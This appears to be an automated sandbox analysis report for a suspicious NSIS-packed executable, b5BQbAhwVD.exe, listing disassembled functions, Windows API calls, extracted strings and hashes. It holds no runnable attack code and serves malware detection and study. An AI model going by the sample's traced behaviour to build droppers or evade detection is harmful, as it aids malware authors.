C:\Users\user\AppData\Local\Temp\, xrefs: 004036DD, 004036E2, 004036F8, 00403704, 00403713, 00403720, 0040372C, 00403734, 0040384A, 0040385B, 00403866, 00403872, 0040387F, 0040388E, 0040393F
NSIS Error, xrefs: 00403567

Memory Dump Source

Source File: 00000000.00000002.2383814356.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2383728122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2384223170.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2384256546.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2384256546.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2384256546.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2384256546.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2384256546.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2384368266.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_b5BQbAhwVD.jbxd

Similarity

API ID: lstrcat$FileProcess$Exit$CurrentDeleteDirectoryEnvironmentHandlePathTempTokenVariableWindows$AddressAdjustCharCloseCommandCopyErrorInfoInitializeLineLookupModeModuleNextOpenPrivilegePrivilegesProcUninitializeValueVersionlstrcmpilstrcpynlstrlen
String ID: "C:\Users\user\Desktop\b5BQbAhwVD.exe"$.tmp$1033$C:\Users\user\AppData\Local\Iw$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop\b5BQbAhwVD.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu
API String ID: 3441113951-1494625539
Opcode ID: e11a689ec9d555b5fe2f652178506891ef29a00bc77516d82e2752c077597b55
Instruction ID: dafc1af32610b20ef8647c0cf6a3faef20d76686829591872cbc6ab955e55f97
Opcode Fuzzy Hash: e11a689ec9d555b5fe2f652178506891ef29a00bc77516d82e2752c077597b55
Instruction Fuzzy Hash: 4DD1F571600310ABE7206F759D49A3B3AECEB4070AF50443FF981B62D2DB7D8956876E

Function 00404DCC Relevance: 63.5, APIs: 33, Strings: 3, Instructions: 481
windowmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetDlgItem.USER32(?,000003F9), ref: 00404DE4
GetDlgItem.USER32(?,00000408), ref: 00404DEF
GlobalAlloc.KERNEL32(00000040,?), ref: 00404E39
LoadBitmapW.USER32(0000006E), ref: 00404E4C
SetWindowLongW.USER32(?,000000FC,004053C4), ref: 00404E65
ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404E79
ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404E8B
SendMessageW.USER32(?,00001109,00000002), ref: 00404EA1
SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404EAD
SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404EBF
DeleteObject.GDI32(00000000), ref: 00404EC2
SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404EED
SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404EF9
SendMessageW.USER32(?,00001132,00000000,?), ref: 00404F8F
SendMessageW.USER32(?,0000110A,00000003,00000000), ref: 00404FBA
SendMessageW.USER32(?,00001132,00000000,?), ref: 00404FCE
GetWindowLongW.USER32(?,000000F0), ref: 00404FFD
SetWindowLongW.USER32(?,000000F0,00000000), ref: 0040500B
ShowWindow.USER32(?,00000005), ref: 0040501C
SendMessageW.USER32(?,00000419,00000000,?), ref: 00405119
SendMessageW.USER32(?,00000147,00000000,00000000), ref: 0040517E
SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00405193
SendMessageW.USER32(?,00000420,00000000,00000020), ref: 004051B7
SendMessageW.USER32(?,00000200,00000000,00000000), ref: 004051D7
ImageList_Destroy.COMCTL32(?), ref: 004051EC
GlobalFree.KERNEL32(?), ref: 004051FC
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00405275
SendMessageW.USER32(?,00001102,?,?), ref: 0040531E
SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 0040532D
InvalidateRect.USER32(?,00000000,00000001), ref: 0040534D
ShowWindow.USER32(?,00000000), ref: 0040539B
GetDlgItem.USER32(?,000003FE), ref: 004053A6
ShowWindow.USER32(00000000), ref: 004053AD

Strings

M, xrefs: 00404F76
, xrefs: 00405385
N, xrefs: 00405057

Memory Dump Source

Source File: 00000000.00000002.2383814356.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2383728122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2384223170.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2384256546.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2384256546.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2384256546.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2384256546.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2384256546.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2384368266.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_b5BQbAhwVD.jbxd

Similarity

API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
String ID: $M$N
API String ID: 1638840714-813528018
Opcode ID: fb644b25ca39ae204efa7e1d1243337108994715b0d322cb34e58838b66aab8b
Instruction ID: 7f687e55a7f93217ddba54fde82f382d197ef8b4c31ab339cf60f2545021b201
Opcode Fuzzy Hash: fb644b25ca39ae204efa7e1d1243337108994715b0d322cb34e58838b66aab8b
Instruction Fuzzy Hash: DD028DB0A00609EFDF209F94CD85AAE7BB5FB44354F10807AE611BA2E0C7798D52CF58

Function 00405AFA Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 148
filestringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DeleteFileW.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\,76232EE0,00000000), ref: 00405B23
lstrcatW.KERNEL32(00425730,\*.*,00425730,?,?,C:\Users\user\AppData\Local\Temp\,76232EE0,00000000), ref: 00405B6B
lstrcatW.KERNEL32(?,0040A014,?,00425730,?,?,C:\Users\user\AppData\Local\Temp\,76232EE0,00000000), ref: 00405B8E
lstrlenW.KERNEL32(?,?,0040A014,?,00425730,?,?,C:\Users\user\AppData\Local\Temp\,76232EE0,00000000), ref: 00405B94
FindFirstFileW.KERNEL32(00425730,?,?,?,0040A014,?,00425730,?,?,C:\Users\user\AppData\Local\Temp\,76232EE0,00000000), ref: 00405BA4
FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405C44
FindClose.KERNEL32(00000000), ref: 00405C53

Strings

0WB, xrefs: 00405B53
\*.*, xrefs: 00405B65
"C:\Users\user\Desktop\b5BQbAhwVD.exe", xrefs: 00405AFA
C:\Users\user\AppData\Local\Temp\, xrefs: 00405B08

Memory Dump Source

Source File: 00000000.00000002.2383814356.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2383728122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2384223170.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2384256546.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2384256546.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2384256546.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2384256546.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2384256546.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2384368266.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_b5BQbAhwVD.jbxd

Similarity

API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
String ID: "C:\Users\user\Desktop\b5BQbAhwVD.exe"$0WB$C:\Users\user\AppData\Local\Temp\$\*.*
API String ID: 2035342205-908781105
Opcode ID: 94aee6277fb60bc187ec105b0c3c889327325094ff3d5538513028a918914a00
Instruction ID: 490a569b50011677cd34e026f6ab1003dec3a9533e419df12a6715eb2ed0bc70
Opcode Fuzzy Hash: 94aee6277fb60bc187ec105b0c3c889327325094ff3d5538513028a918914a00
Instruction Fuzzy Hash: 0541BF30805B18A6EB31AB618D89BAF7678EF41718F10817BF801711D2D77C59C29EAE

Function 00406AF2 Relevance: 5.4, APIs: 4, Instructions: 382COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2383814356.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2383728122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2384223170.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2384256546.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2384256546.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2384256546.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2384256546.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2384256546.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2384368266.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_b5BQbAhwVD.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 35cbb8abcdf375330cdaaed117d7ae66e2d52f36901990e867650d9b3411c4d0
Instruction ID: 8a3521d6a9ab1c5b5eb45e3d7957e6eefdd785676f1866d9874d60d9aff9e69c
Opcode Fuzzy Hash: 35cbb8abcdf375330cdaaed117d7ae66e2d52f36901990e867650d9b3411c4d0
Instruction Fuzzy Hash: 1CF16770D04229CBDF18CFA8C8946ADBBB0FF45305F25816ED856BB281D7386A86DF45

Function 0040672B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 14fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNELBASE(?,00426778,00425F30,00405E0E,00425F30,00425F30,00000000,00425F30,00425F30,?,?,76232EE0,00405B1A,?,C:\Users\user\AppData\Local\Temp\,76232EE0), ref: 00406736
FindClose.KERNEL32(00000000), ref: 00406742

Strings

xgB, xrefs: 0040672C

Memory Dump Source

Source File: 00000000.00000002.2383814356.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2383728122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2384223170.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2384256546.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2384256546.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2384256546.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2384256546.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2384256546.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2384368266.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_b5BQbAhwVD.jbxd

Similarity

API ID: Find$CloseFileFirst
String ID: xgB
API String ID: 2295610775-399326502
Opcode ID: 8f8798618dbeb96281b7e152f222c6bef4cfc1fb78c0b92afc6d3f182eb863fd
Instruction ID: 964bfaba6fe47efa91ae3b9d04416f3a0311ddb8c2b0a677c8b566ff70b98767
Opcode Fuzzy Hash: 8f8798618dbeb96281b7e152f222c6bef4cfc1fb78c0b92afc6d3f182eb863fd
Instruction Fuzzy Hash: 08D012315150205BC2011738BD4C85B7A589F553357228B37B866F61E0C7348C62869C

Function 00403E86 Relevance: 58.1, APIs: 32, Strings: 1, Instructions: 346
windowstringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403EC2
ShowWindow.USER32(?), ref: 00403EDF
DestroyWindow.USER32 ref: 00403EF3
SetWindowLongW.USER32(?,00000000,00000000), ref: 00403F0F
GetDlgItem.USER32(?,?), ref: 00403F30
SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00403F44
IsWindowEnabled.USER32(00000000), ref: 00403F4B
GetDlgItem.USER32(?,00000001), ref: 00403FF9
GetDlgItem.USER32(?,00000002), ref: 00404003
SetClassLongW.USER32(?,000000F2,?), ref: 0040401D
SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 0040406E
GetDlgItem.USER32(?,00000003), ref: 00404114
ShowWindow.USER32(00000000,?), ref: 00404135
KiUserCallbackDispatcher.NTDLL(?,?), ref: 00404147
EnableWindow.USER32(?,?), ref: 00404162
GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00404178
EnableMenuItem.USER32(00000000), ref: 0040417F
SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 00404197
SendMessageW.USER32(?,00000401,00000002,00000000), ref: 004041AA
lstrlenW.KERNEL32(00423728,?,00423728,00000000), ref: 004041D4
SetWindowTextW.USER32(?,00423728), ref: 004041E8
ShowWindow.USER32(?,0000000A), ref: 0040431C

Strings

(7B, xrefs: 004041C4

Memory Dump Source

Source File: 00000000.00000002.2383814356.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2383728122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2384223170.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2384256546.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2384256546.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2384256546.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2384256546.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2384256546.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2384368266.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_b5BQbAhwVD.jbxd

Similarity

API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
String ID: (7B
API String ID: 3282139019-3251261122
Opcode ID: 42b69af187e06dbbd4ac4a762ea4715538cd3e369663267481291b142cb35f12
Instruction ID: 1e1a27d6975204c591228116fe5edee23a209105d2649c04e919f1d7e5095d09
Opcode Fuzzy Hash: 42b69af187e06dbbd4ac4a762ea4715538cd3e369663267481291b142cb35f12
Instruction Fuzzy Hash: 6FC1A2B1644200FBDB216F61EE85D2A3BB8EB94706F40053EFA41B11F1CB7958529B6D

Function 00403AD8 Relevance: 47.5, APIs: 13, Strings: 14, Instructions: 215
stringregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 004067C2: GetModuleHandleA.KERNEL32(?,00000020,?,00403517,0000000A), ref: 004067D4
Part of subcall function 004067C2: GetProcAddress.KERNEL32(00000000,?), ref: 004067EF

lstrcatW.KERNEL32(1033,00423728,80000001,Control Panel\Desktop\ResourceLocale,00000000,00423728,00000000,00000002,C:\Users\user\AppData\Local\Temp\,76233420,"C:\Users\user\Desktop\b5BQbAhwVD.exe",00000000), ref: 00403B59
lstrlenW.KERNEL32(Call,?,?,?,Call,00000000,C:\Users\user\AppData\Local\Iw,1033,00423728,80000001,Control Panel\Desktop\ResourceLocale,00000000,00423728,00000000,00000002,C:\Users\user\AppData\Local\Temp\), ref: 00403BD9
lstrcmpiW.KERNEL32(?,.exe,Call,?,?,?,Call,00000000,C:\Users\user\AppData\Local\Iw,1033,00423728,80000001,Control Panel\Desktop\ResourceLocale,00000000,00423728,00000000), ref: 00403BEC
GetFileAttributesW.KERNEL32(Call), ref: 00403BF7
LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Local\Iw), ref: 00403C40

Part of subcall function 0040632F: wsprintfW.USER32 ref: 0040633C

RegisterClassW.USER32(004291E0), ref: 00403C7D
SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403C95
CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403CCA
ShowWindow.USER32(00000005,00000000), ref: 00403D00
GetClassInfoW.USER32(00000000,RichEdit20W,004291E0), ref: 00403D2C
GetClassInfoW.USER32(00000000,RichEdit,004291E0), ref: 00403D39
RegisterClassW.USER32(004291E0), ref: 00403D42
DialogBoxParamW.USER32(?,00000000,00403E86,00000000), ref: 00403D61

Strings

Call, xrefs: 00403BA0, 00403BA9, 00403BB7, 00403C06, 00403C0C
Control Panel\Desktop\ResourceLocale, xrefs: 00403B0C
C:\Users\user\AppData\Local\Iw, xrefs: 00403B68, 00403B70, 00403C13, 00403C19, 00403C29
_Nb, xrefs: 00403C5C, 00403CC4
.DEFAULT\Control Panel\International, xrefs: 00403B44
1033, xrefs: 00403AF8, 00403B54
RichEd20, xrefs: 00403D06
RichEdit20W, xrefs: 00403D24, 00403D2A
.exe, xrefs: 00403BE6
RichEdit, xrefs: 00403D33
RichEd32, xrefs: 00403D14
"C:\Users\user\Desktop\b5BQbAhwVD.exe", xrefs: 00403ADC
C:\Users\user\AppData\Local\Temp\, xrefs: 00403AE4
(7B, xrefs: 00403B04

Memory Dump Source

Source File: 00000000.00000002.2383814356.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2383728122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2384223170.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2384256546.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2384256546.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2384256546.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2384256546.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2384256546.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2384368266.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_b5BQbAhwVD.jbxd

Similarity

API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
String ID: "C:\Users\user\Desktop\b5BQbAhwVD.exe"$(7B$.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Iw$C:\Users\user\AppData\Local\Temp\$Call$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
API String ID: 1975747703-2799127187
Opcode ID: faef508d5617ccaf29f7204e00c3b9242aa942859a9d4d687d906c1b184c1908
Instruction ID: f49b718e50d7a26840138b6048ee10d29e8519d5aa43f5d66e73d4226ad9b376
Opcode Fuzzy Hash: faef508d5617ccaf29f7204e00c3b9242aa942859a9d4d687d906c1b184c1908
Instruction Fuzzy Hash: FF61C470204700BBE220AF669E45F2B3A7CEB84B49F40447FF945B22E2DB7D5912C62D

Function 00402F30 Relevance: 24.7, APIs: 5, Strings: 9, Instructions: 203
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTickCount.KERNEL32 ref: 00402F44
GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\b5BQbAhwVD.exe,00000400), ref: 00402F60

Part of subcall function 00405EDE: GetFileAttributesW.KERNELBASE(00000003,00402F73,C:\Users\user\Desktop\b5BQbAhwVD.exe,80000000,00000003), ref: 00405EE2
Part of subcall function 00405EDE: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405F04

GetFileSize.KERNEL32(00000000,00000000,00439000,00000000,00436800,00436800,C:\Users\user\Desktop\b5BQbAhwVD.exe,C:\Users\user\Desktop\b5BQbAhwVD.exe,80000000,00000003), ref: 00402FA9
GlobalAlloc.KERNELBASE(00000040,0040A230), ref: 004030F0

Strings

Error launching installer, xrefs: 00402F80
soft, xrefs: 00403020
C:\Users\user\Desktop\b5BQbAhwVD.exe, xrefs: 00402F4A, 00402F59, 00402F6D, 00402F8A
Inst, xrefs: 00403017
Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 00403187
Error writing temporary file. Make sure your temp folder is valid., xrefs: 00403139
"C:\Users\user\Desktop\b5BQbAhwVD.exe", xrefs: 00402F30
C:\Users\user\AppData\Local\Temp\, xrefs: 00402F3D, 00403108
Null, xrefs: 00403029

Memory Dump Source

Source File: 00000000.00000002.2383814356.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2383728122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2384223170.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2384256546.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2384256546.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2384256546.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2384256546.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2384256546.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2384368266.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_b5BQbAhwVD.jbxd

Similarity

API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
String ID: "C:\Users\user\Desktop\b5BQbAhwVD.exe"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop\b5BQbAhwVD.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
API String ID: 2803837635-1167483307
Opcode ID: 17d4548877bb422f8be7689a7878bb05eb645905850902383813b6e2c7289b3d
Instruction ID: fab51a6d61a7302470dd91ad27108f0c0be819ae48098b15a947b51e22d3bd00
Opcode Fuzzy Hash: 17d4548877bb422f8be7689a7878bb05eb645905850902383813b6e2c7289b3d
Instruction Fuzzy Hash: 4961D271A00205ABDB20DFA4DD45A9A7BA8EB04356F20413FF904F62D1DB7C9A458BAD

Function 0040640A Relevance: 17.7, APIs: 7, Strings: 3, Instructions: 209
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSystemDirectoryW.KERNEL32(Call,00000400), ref: 0040654B
GetWindowsDirectoryW.KERNEL32(Call,00000400,00000000,00422708,?,00405487,00422708,00000000), ref: 0040655E
SHGetSpecialFolderLocation.SHELL32(00405487,00000000,00000000,00422708,?,00405487,00422708,00000000), ref: 0040659A
SHGetPathFromIDListW.SHELL32(00000000,Call), ref: 004065A8
CoTaskMemFree.OLE32(00000000), ref: 004065B3
lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 004065D9
lstrlenW.KERNEL32(Call,00000000,00422708,?,00405487,00422708,00000000), ref: 00406631

Strings

Call, xrefs: 00406434, 0040650F, 00406516, 0040651A, 00406534, 00406535, 0040654A, 0040655D, 00406579, 004065A4, 004065D8, 004065DE, 004065FA, 0040660D, 0040662A, 00406630, 0040663C, 0040666F
Software\Microsoft\Windows\CurrentVersion, xrefs: 0040651B
\Microsoft\Internet Explorer\Quick Launch, xrefs: 004065D3

Memory Dump Source

Source File: 00000000.00000002.2383814356.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2383728122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2384223170.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2384256546.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2384256546.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2384256546.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2384256546.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2384256546.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2384368266.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_b5BQbAhwVD.jbxd

Similarity

API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskWindowslstrcatlstrlen
String ID: Call$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
API String ID: 717251189-1230650788
Opcode ID: 05bff3a2d83114fcd993f4ecc25878232afbb7d489ed6444c63e00c36f1e26dc
Instruction ID: bd17f2555f8fb0ecb5cfb39a154c1e2018f2892b34e65fa403921cbdc39efe9b
Opcode Fuzzy Hash: 05bff3a2d83114fcd993f4ecc25878232afbb7d489ed6444c63e00c36f1e26dc
Instruction Fuzzy Hash: A4612371A00115ABDF209F64DD41AAE37A5AF50314F62813FE903B72D0E73E9AA2C75D

Function 0040176F Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 145
stringtimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

lstrcatW.KERNEL32(00000000,00000000,Call,00436000,?,?,00000031), ref: 004017B0
CompareFileTime.KERNEL32(-00000014,?,Call,Call,00000000,00000000,Call,00436000,?,?,00000031), ref: 004017D5

Part of subcall function 004063E8: lstrcpynW.KERNEL32(?,?,00000400,00403576,00429240,NSIS Error,?,00000006,00000008,0000000A), ref: 004063F5

Part of subcall function 00405450: lstrlenW.KERNEL32(00422708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402F08,00000000,?), ref: 00405488
Part of subcall function 00405450: lstrlenW.KERNEL32(00402F08,00422708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402F08,00000000), ref: 00405498
Part of subcall function 00405450: lstrcatW.KERNEL32(00422708,00402F08,00402F08,00422708,00000000,00000000,00000000), ref: 004054AB
Part of subcall function 00405450: SetWindowTextW.USER32(00422708,00422708), ref: 004054BD
Part of subcall function 00405450: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004054E3
Part of subcall function 00405450: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004054FD
Part of subcall function 00405450: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040550B

Strings

Call, xrefs: 0040178D, 004017A3, 004017B5, 004017C1, 004017F7, 0040180D, 0040182B, 00401867, 004018E8, 004018F1, 004018FB, 00401906
C:\Users\user\AppData\Local\Temp\nss456A.tmp\System.dll, xrefs: 00401835, 00401851
C:\Users\user\AppData\Local\Temp\nss456A.tmp, xrefs: 00401821, 0040183F

Memory Dump Source

Source File: 00000000.00000002.2383814356.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2383728122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2384223170.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2384256546.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2384256546.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2384256546.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2384256546.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2384256546.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2384368266.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_b5BQbAhwVD.jbxd

Similarity

API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
